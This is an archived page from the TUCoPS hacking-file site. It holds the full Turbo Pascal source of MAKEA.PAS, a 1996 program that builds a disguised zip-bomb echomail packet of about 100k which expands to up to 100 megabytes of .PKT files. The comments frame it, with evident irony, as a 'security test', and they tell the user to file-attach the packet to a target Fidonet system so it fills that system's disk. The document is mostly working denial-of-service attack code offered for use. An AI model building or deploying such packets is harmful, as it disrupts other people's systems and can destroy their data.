Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Dialup BBSes :: makea.pas

Misc PC: Source code for a Pascal program to "Test Echomail Security" (yeah right)




(*                                                                           *)
(* MAKEA.PAS - A Turbo Pascal Program for testing Fidonet echomail security  *)
(*                                                                           *)
(* This program was written and tested in Turbo Pascal 7, it should compile  *)
(* fine in TP5.5 and 6 if that's what you have.  This file should compile    *)
(* right "out of the box" without modification; if it doesn't you might have *)
(* a hacked or corrupted copy.                                               *)
(*                                                                           *)
(* This program aids in testing the security of echomail systems in Fidonet  *)
(* by creating a valid ZIP archive echomail packet.  This packet appears     *)
(* relatively innocuous at about 100k in size (typical for many echomail     *)
(* systems) but it contains PKT files which expand to a megabyte apiece.     *)
(* Up to 100 of these 1 meg files will be created, if the target system's    *)
(* hard drive has enough space.  Fortunately, only one 1MB file is created   *)
(* on your system when you run the program.  You should have 1.5 MB free.    *)
(*                                                                           *)
(* To test the security of another system, take the following steps:         *)
(*                                                                           *)
(* (1) Compile and run this program.  It will create a packet file calling   *)
(* PKZIP.EXE (if found on your path).  This operation will take several      *)
(* minutes, depending on the speed of your system.                           *)
(*                                                                           *)
(* (2) File-attach the file to the target system.  It is very important      *)
(* that you use your own mailer with all your addresses intact and that you  *)
(* not use Caller-ID blocking, so that the target sysop knows that this is   *)
(* only a test and not an actual attack by a crasher.                        *)
(*                                                                           *)
(* That's it.  If the target system's echomail processor is insecure, there  *)
(* will be up to 100 megs of .PKT files in the target's echomail directory.  *)
(* If you are worried you might fill the target's hard disk during this      *)
(* test, you should modify the program so as to decrease the number of files *)
(* added to the packet or the size of those files.  A larger number of small *)
(* files will result in a larger packet size, and unfortunately, a higher    *)
(* likelihood that the test will *completely* fill the hard drive should the *)
(* target be careless enough not to have 100 megs free.  And of course, NEVER*)
(* send such a packet to someone who is unaware that you are conducting a    *)
(* security test or at a time when the target sysop is unlikely to be        *)
(* present to delete the .PKT files!                                         *)
(*                                                                           *)
(* This program is presented in source form because:                         *)
(*                                                                           *)
(* - this way you know for sure it has no virii or trojan surprises          *)
(*                                                                           *)
(* - you can totally reconfigure it or add features                          *)
(*                                                                           *)
(* - it's free and I don't care who hacks it up or how                       *)
(*                                                                           *)
(* - a real hacker has at least the minimal programming skill needed to      *)
(*   compile a pascal program!                                               *)
(*                                                                           *)
(*                                                                           *)
(* Program and DoubleSpeak Docs [K] KopyLeft 1996 The Kopyleftist            *)
(*                                                                           *)

{$M 8192,0,0}
uses dos;
var i:longint;
    name,nextname:string;
    zipexe:string;

procedure make1megfile(filename:string); {makes a 1 meg file full of 6's}
var f:text;
begin
  assign(f,filename);
  rewrite(f);
  for i:=1 to 10000 do
    write(f,'6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666');
  flush(f);
  close(f);
end;

procedure add2zip(zipname,filename:string);
var c,p:string;
begin
  c:=zipexe;
  p:=zipname+' '+filename;
  swapvectors;
  exec(c,p);
  swapvectors;
end;

procedure _rename(oldname,newname:string);
var f:file;
begin
  assign(f,oldname);
  rename(f,newname);
end;

procedure getzipexe;
var s:pathstr;
begin
  s:=fsearch('PKZIP.EXE',getenv('PATH'));
  if
    s=''
  then
    begin
      writeln('Unable to locate PKZIP.EXE in path!');
      halt;
    end;
  zipexe:=s;
end;

begin
  writeln('Makea by The Kopyleftist');
  getzipexe;
  name:='1.PKT';
  writeln('Creating prototype file...');
  make1megfile(name);
  writeln('Adding 100 copies to bogus echomail packet zipfile 0000FFFF.MO0...');
  add2zip('0000FFFF.MO0',name);
  for i:=2 to 100 do
    begin
      str(i,nextname);
      nextname:=nextname+'.PKT';
      _rename(name,nextname);
      name:=nextname;
      add2zip('0000FFFF.MO0',name);
    end;
end.

(* Uploaded to: Tommy's Holiday Camp BBS  1-604-361-4549 *)


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH